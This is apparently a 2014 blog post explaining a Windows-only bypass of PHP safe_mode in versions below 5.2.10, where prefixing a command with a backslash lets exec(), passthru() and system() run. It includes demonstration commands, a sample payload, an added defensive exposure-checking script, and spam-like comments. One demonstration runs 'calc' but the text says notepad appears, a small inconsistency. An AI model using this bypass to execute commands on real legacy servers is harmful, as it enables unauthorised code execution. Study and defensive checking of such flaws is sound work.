Thursday, October 23, 2014

Posted by Paulos Yibelo
6 comments | 2:19 PM

Note: This method only works on Windows and wasn't discovered by me, but by one of the greatest web researchers I know; I just had to share it.

To test this, make sure you have a PHP version lower than 5.2.10 on a Windows machine.
Make sure your php.ini file has safe_mode set to On, or simply enable it on the command line:

C:\xampp\php>php -n -d safe_mode=on -r "exec('notepad');"

The command “/notepad” is either misspelled or could not be found.

So what does that tell us? It looks like all safe_mode does is add a "/" in front of whatever input we give it (which would be bad). Aside from the many other bypasses you might think of, there is one, for Windows only, that bypasses safe_mode by putting a backslash in front of the command:

C:\xampp\php>php -n -d safe_mode=on -r "exec('\calc');"

Aside from the many errors being generated, the code still gets executed and notepad will now pop up.

So our final payload to execute commands while safe_mode is 1 is:

<?php exec('\echo "SHIT" >> notepad.txt'); ?>

This works with the exec(), passthru() and system() functions.
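
A defensive check built from the conditions this post names (Windows, PHP below 5.2.10, safe_mode on, exec()/passthru()/system() callable), added here as an example that is not part of the original post. The function names and the sample host rows are made up for illustration; disable_functions is the standard php.ini directive.

```php
<?php
// Added example, not code from the original post: exposure check for the
// safe_mode bypass described above. PHP 5.2-compatible syntax on purpose.
// Conditions from the post: Windows, PHP < 5.2.10, safe_mode on, and
// exec()/passthru()/system() still callable.
function callable_exec_functions($disableFunctions)
{
    $affected = array('exec', 'passthru', 'system');
    $disabled = array_map('trim', explode(',', strtolower($disableFunctions)));
    return array_values(array_diff($affected, $disabled));
}

function ini_is_on($value)
{
    return in_array(strtolower(trim((string) $value)), array('1', 'on', 'yes', 'true'), true);
}

function assess_exposure($os, $version, $safeMode, $disableFunctions)
{
    $callable = callable_exec_functions($disableFunctions);
    if (!ini_is_on($safeMode)) {
        return 'n/a: safe_mode is off or absent, so it restricts nothing here';
    }
    if (count($callable) === 0) {
        return 'ok: exec, passthru and system are all in disable_functions';
    }
    $windows = strtoupper(substr($os, 0, 3)) === 'WIN';
    if ($windows && version_compare($version, '5.2.10', '<')) {
        return 'EXPOSED: safe_mode does not contain ' . implode(', ', $callable)
             . '; upgrade PHP and list them in disable_functions';
    }
    return 'not the case from the post, but still callable: ' . implode(', ', $callable);
}

// Constructed sample hosts: array(OS, PHP version, safe_mode, disable_functions).
$samples = array(
    array('WINNT', '5.2.9',  '1', ''),
    array('WINNT', '5.2.9',  '1', 'exec, passthru, system'),
    array('WINNT', '5.2.17', '1', 'exec'),
    array('Linux', '5.2.9',  '1', ''),
);
foreach ($samples as $s) {
    echo implode(' / ', $s), ' => ', assess_exposure($s[0], $s[1], $s[2], $s[3]), "\n";
}

// The host this script runs on; ini_get() returns false where safe_mode no longer exists.
echo 'this host => ', assess_exposure(PHP_OS, PHP_VERSION, ini_get('safe_mode'), ini_get('disable_functions')), "\n";
```

Only the first sample row meets every condition from the post and is reported as EXPOSED; the second shows that listing the three functions in disable_functions removes the dependence on safe_mode.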


  1. Great Post, Actually PHP is a beautiful source for developing a database driven web application, I love this post, thanks for spending your time for discussing about this topic.

  2. This comment has been removed by the author.

  3. Great post! Will try to release your method on my own website! Thanks!

  4. Much thanks, the information is certainly wholesome! I can see that the searcher is a specialist in the area. As contrasted with the numerous guest posts I have looked over on the question, this one offers advanced viewpoints. This web site frequently furnishes a quantity of interesting posts on the vital concerns. My sister and I read them constantly.

  5. The investigation is surely helpful! Without a doubt, the researcher is talented in the field of speciality.